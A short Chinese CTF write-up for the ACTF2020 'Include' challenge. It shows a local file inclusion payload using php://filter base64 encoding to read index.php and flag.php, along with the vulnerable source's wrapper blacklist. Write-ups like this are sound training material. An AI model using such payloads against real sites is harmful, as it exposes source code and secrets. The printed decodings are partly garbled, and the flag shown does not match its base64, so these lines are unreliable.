【ctfdouble】[ACTF2020 新生赛]Include

1、进入页面后,发现是一个超链接 点进去之后只有Can you find out the flag?一段文字。但是发现地址栏是file=flag.php
考虑文件包含。
2、F12查看源代码,没有发现什么
3、读取源代码
?file=php://filter/read=convert.base64-encode/resource=index.php
发现了一段PG1ldGEgY2hhcnNldD0idXRmOCI+Cjw/cGhwCmVycm9yX3JlcG9ydGluZygwKTsKJGZpbGUgPSAkX0dFVFsiZmlsZSJdOwppZihzdHJpc3RyKCRmaWxlLCJwaHA6Ly9pbnB1dCIpIHx8IHN0cmlzdHIoJGZpbGUsInppcDovLyIpIHx8IHN0cmlzdHIoJGZpbGUsInBoYXI6Ly8iKSB8fCBzdHJpc3RyKCRmaWxlLCJkYXRhOiIpKXsKCWV4aXQoJ2hhY2tlciEnKTsKfQppZigkZmlsZSl7CglpbmNsdWRlKCRmaWxlKTsKfWVsc2V7CgllY2hvICc8YSBocmVmPSI/ZmlsZT1mbGFnLnBocCI+dGlwczwvYT4nOwp9Cj8+Cg==
base64编码。
解码后得到

tips'; } ?>

4、读flag.php的源代码?file=php://filter/read=convert.base64-encode/resource=flag.php
得到PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL0NURjJ7ODQyYTcwYWEtMDRmMC00ODliLTg4MDYtODUwOTY2NzU1MDkzfQo=
解码后得到<?php
echo "Can you find out the flag?";
//CTF2{3}

posted @ 2026-07-09 15:40  方才多有冒犯  阅读(1)  评论(0)    收藏  举报